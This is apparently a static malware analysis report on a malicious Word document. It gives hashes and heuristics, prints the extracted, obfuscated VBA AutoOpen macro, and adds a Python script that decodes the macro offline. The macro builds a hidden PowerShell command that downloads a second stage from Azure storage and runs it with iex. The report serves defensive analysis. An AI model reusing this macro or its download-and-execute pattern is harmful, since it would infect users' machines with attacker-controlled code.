Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5162b871a5689b77…

MALICIOUS

Office (OLE)

Size: 282.5 KB
Created: 2018-02-26 17:33:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 05f6112da66dd8e727d508996d68fcd4
SHA-1: 50f4ad3c58c3a9e7cfd5d9cdff4a9428faeb40b8
SHA-256: 5162b871a5689b77b28f9e6b9e6c47a34e79a52e4a6948edb75eb1ff5f594344
Risk score: 202

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1059.001 PowerShell (the command line and encoded script the macro assembles, see the analysis below)

The file contains a VBA AutoOpen macro (the AutoOpen name is also what trips the legacy WordBasic auto-exec heuristic below) that builds and launches an obfuscated PowerShell command. The macro assembles the command line one character at a time from a 20-entry character array (JP_SE); the part visible in the truncated listing reads `powershell -windowstyle hidden -executionpolicy by...`, i.e. a hidden window and an execution-policy bypass. In parallel it concatenates several dozen short string fragments into one base64 blob (AN_SG). That blob is UTF-16LE text, the layout PowerShell's -EncodedCommand switch expects, and it decodes to a short script that defines a base64-decoding helper function, fetches a resource with invoke-webrequest from an https:// URL on an Azure Table Storage endpoint (table.core.windows.net, with a SAS token in the query string: sv=, ss=, srt=, sp=) and hands the decoded response to iex. The second stage is therefore hosted in cloud storage rather than embedded in the document, which is why no payload is carved from the file itself. The ClamAV detection 'Doc.Dropper.Agent-6458367-0' is consistent with this downloader behaviour.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6458367-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458367-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. In this sample the marker is simply the VBA AutoOpen procedure whose source was recovered into macros.bas (see Extracted artifacts), so the finding duplicates OLE_VBA_AUTOOPEN rather than pointing at WordBasic-only code.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI carried by any Office document that contains a drawing; it is not an indicator. The macro's download URL does not appear in this list because it only exists as base64-encoded UTF-16LE fragments inside the VBA source and is never written to the document body in clear text.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6046 bytes
SHA-256: 7084a7102b3017f4dfd7522151f9321659834d3cdc31a6950cc05e87ab47e8b3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wrap"
Sub AutoOpen()
    Dim JR_PA As String
    JP_SE = Array("c", "s", "x", "p", "d", " ", "t", "n", "y", "u", "w", "i", "r", "a", "h", "b", "o", "l", "e", "-")
    Dim FM_TI As String
    FM_TI = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    JR_PA = JR_PA + JP_SE(3)
    JR_PA = JR_PA + JP_SE(16)
    Dim AO_NF As String
    AO_NF = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQ"
    JR_PA = JR_PA + JP_SE(10)
    JR_PA = JR_PA + JP_SE(18)
    Dim BN_RG As String
    BN_RG = "BzAHQAZQB"
    JR_PA = JR_PA + JP_SE(12)
    JR_PA = JR_PA + JP_SE(1)
    Dim DT_ND As String
    DT_ND = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA"
    JR_PA = JR_PA + JP_SE(14)
    JR_PA = JR_PA + JP_SE(18)
    Dim FM_ME As String
    FM_ME = "DoAOgBVAFQARgA4AC4ARwBlAHQA"
    AN_SG = AN_SG & FM_TI & AO_NF & BN_RG & DT_ND & FM_ME
    JR_PA = JR_PA + JP_SE(17)
    JR_PA = JR_PA + JP_SE(17)
    Dim AK_LJ As String
    AK_LJ = "UwB0AHIAaQBuAGcAK"
    JR_PA = JR_PA + JP_SE(5)
    JR_PA = JR_PA + JP_SE(19)
    Dim HQ_PA As String
    HQ_PA = "ABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB"
    JR_PA = JR_PA + JP_SE(10)
    JR_PA = JR_PA + JP_SE(11)
    Dim FM_NI As String
    FM_NI = "lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUAN"
    JR_PA = JR_PA + JP_SE(7)
    JR_PA = JR_PA + JP_SE(4)
    Dim AR_OB As String
    AR_OB = "gA0AFMAdAByAGkAbgBnACgAJ"
    JR_PA = JR_PA + JP_SE(16)
    JR_PA = JR_PA + JP_SE(10)
    Dim EP_MD As String
    EP_MD = "AB4ACkAKQ"
    AN_SG = AN_SG & AK_LJ & HQ_PA & FM_NI & AR_OB & EP_MD
    JR_PA = JR_PA + JP_SE(1)
    JR_PA = JR_PA + JP_SE(6)
    Dim IK_RI As String
    IK_RI = "B9ADsAaQBlAHgAIAAkACgAYQAgACQAKAAkAC"
    JR_PA = JR_PA + JP_SE(8)
    JR_PA = JR_PA + JP_SE(17)
    Dim HS_OA As String
    HS_OA = "gAJAAoAGkAbgB2AG8AawBlAC0AdwBlAG"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(5)
    Dim IL_TI As String
    IL_TI = "IAcgBlAHEAdQBlAHMAdAAgACcAaA"
    JR_PA = JR_PA + JP_SE(14)
    JR_PA = JR_PA + JP_SE(11)
    Dim FM_QG As String
    FM_QG = "B0AHQAcAB"
    JR_PA = JR_PA + JP_SE(4)
    JR_PA = JR_PA + JP_SE(4)
    Dim ER_QA As String
    ER_QA = "zADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuA"
    AN_SG = AN_SG & IK_RI & HS_OA & IL_TI & FM_QG & ER_QA
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(7)
    Dim DQ_NH As String
    DQ_NH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
    JR_PA = JR_PA + JP_SE(5)
    JR_PA = JR_PA + JP_SE(19)
    Dim JL_OH As String
    JL_OH = "BpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(2)
    Dim GT_PF As String
    GT_PF = "QBzAGUAP"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(0)
    Dim AP_KB As String
    AP_KB = "wAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG"
    JR_PA = JR_PA + JP_SE(9)
    JR_PA = JR_PA + JP_SE(6)
    Dim JS_SF As String
    JS_SF = "4ASwBlAHkAJQ"
    AN_SG = AN_SG & DQ_NH & JL_OH & GT_PF & AP_KB & JS_SF
    JR_PA = JR_PA + JP_SE(11)
    JR_PA = JR_PA + JP_SE(16)
    Dim BN_QD As String
    BN_QD = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdAB"
    JR_PA = JR_PA + JP_SE(7)
    JR_PA = JR_PA + JP_SE(3)
    Dim FL_KF As String
    FL_KF = "hAGcAZQAlADIANwAmACQAUwBlAGwAZQBjAHQAPQBkA"
    JR_PA = JR_PA + JP_SE(16)
    JR_PA = JR_PA + JP_SE(17)
    Dim DT_OB As String
    DT_OB = "GEAdABhACYAcwB2AD0"
    JR_PA = JR_PA + JP_SE(11)
    JR_PA = JR_PA + JP_SE(0)
    Dim AN_KB As String
    AN_KB = "AMgAwADEANwAtADAANAAtADEANwAmAHMAcw"
    JR_PA = JR_PA + JP_SE(8)
    JR_PA = JR_PA + JP_SE(5)
    Dim EL_TB As String
    EL_TB = "A9AGIAZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0A"
    AN_SG = AN_SG & BN_QD & FL_KF & DT_OB & AN_KB & EL_TB
    JR_PA = JR_PA + JP_SE(15)
    JR_PA = JR_PA + JP_SE(8)
    Dim JQ_LB As String
    JQ
... (truncated)
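The two string builders in the listing above can be replayed offline without running the macro. The Python below is an added example written for this page, not part of the report or of oletools: the JP_SE character table, the sequence of JP_SE(n) indices and the base64 fragments are transcribed from the listing in the order the macro uses them. Because the listing is truncated, both outputs are prefixes of what the real macro would produce, and the decoder tolerates a dangling partial base64 quantum or a half UTF-16 code unit at the end.

```python
"""Replay the AutoOpen macro's string builders (added example, not report code).

The macro builds the PowerShell command line one character at a time from the
JP_SE table and concatenates base64 fragments into AN_SG; the fragments decode
as UTF-16LE, which is the layout PowerShell's -EncodedCommand switch expects.
All data below is transcribed from the truncated macros.bas listing.
"""
import base64

# JP_SE character table, exactly as declared in the macro.
JP_SE = ["c", "s", "x", "p", "d", " ", "t", "n", "y", "u",
         "w", "i", "r", "a", "h", "b", "o", "l", "e", "-"]

# Index argument of every JR_PA = JR_PA + JP_SE(n) statement, in listing order
# (the listing stops after the 50th append, so this is a prefix).
JR_PA_INDICES = [3, 16, 10, 18, 12, 1, 14, 18, 17, 17, 5, 19, 10, 11, 7, 4,
                 16, 10, 1, 6, 8, 17, 18, 5, 14, 11, 4, 4, 18, 7, 5, 19, 18,
                 2, 18, 0, 9, 6, 11, 16, 7, 3, 16, 17, 11, 0, 8, 5, 15, 8]

# Base64 fragments in the order the AN_SG = AN_SG & ... statements join them.
AN_SG_CHUNKS = [
    "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp", "AHsAcgBlAHQAdQByAG4AIABbAFMAeQ",
    "BzAHQAZQB", "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA",
    "DoAOgBVAFQARgA4AC4ARwBlAHQA", "UwB0AHIAaQBuAGcAK",
    "ABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB", "lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUAN",
    "gA0AFMAdAByAGkAbgBnACgAJ", "AB4ACkAKQ",
    "B9ADsAaQBlAHgAIAAkACgAYQAgACQAKAAkAC", "gAJAAoAGkAbgB2AG8AawBlAC0AdwBlAG",
    "IAcgBlAHEAdQBlAHMAdAAgACcAaA", "B0AHQAcAB",
    "zADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuA",
    "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw",
    "BpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad", "QBzAGUAP",
    "wAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG", "4ASwBlAHkAJQ",
    "AyADAAZQBxACUAMgAwACUAMgA3AHMAdAB", "hAGcAZQAlADIANwAmACQAUwBlAGwAZQBjAHQAPQBkA",
    "GEAdABhACYAcwB2AD0", "AMgAwADEANwAtADAANAAtADEANwAmAHMAcw",
    "A9AGIAZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0A",
]


def build_command(table, indices):
    """Replay the JR_PA character-by-character concatenation."""
    return "".join(table[i] for i in indices)


def decode_encoded_command(chunks):
    """Join the AN_SG fragments and decode them as -EncodedCommand text.

    The fragment boundaries are arbitrary, so only the full concatenation is
    valid base64. A truncated listing may leave a partial 4-character quantum
    or an odd byte; both are dropped rather than raising.
    """
    blob = "".join(chunks)
    blob = blob[: len(blob) - len(blob) % 4]      # whole base64 quanta only
    raw = base64.b64decode(blob)
    raw = raw[: len(raw) - len(raw) % 2]          # whole UTF-16 code units only
    return raw.decode("utf-16-le")


def analyse():
    """Return both recovered strings so a caller can diff them against new samples."""
    return {
        "command_prefix": build_command(JP_SE, JR_PA_INDICES),
        "script_prefix": decode_encoded_command(AN_SG_CHUNKS),
    }


if __name__ == "__main__":
    for name, value in analyse().items():
        print(f"{name}: {value}")
```

Running it prints the recovered `powershell -windowstyle hidden -executionpolicy by...` command prefix and the decoded script (a `function a($x)` base64 helper, `invoke-webrequest` against the table.core.windows.net URL, `iex` on the result). The same two functions work on any sample that uses this builder pattern once the table, indices and fragments have been pulled from the olevba output; the fragment-order step matters because the macro interleaves the `Dim` declarations and the `AN_SG` joins, so fragments must be taken in join order, not declaration order.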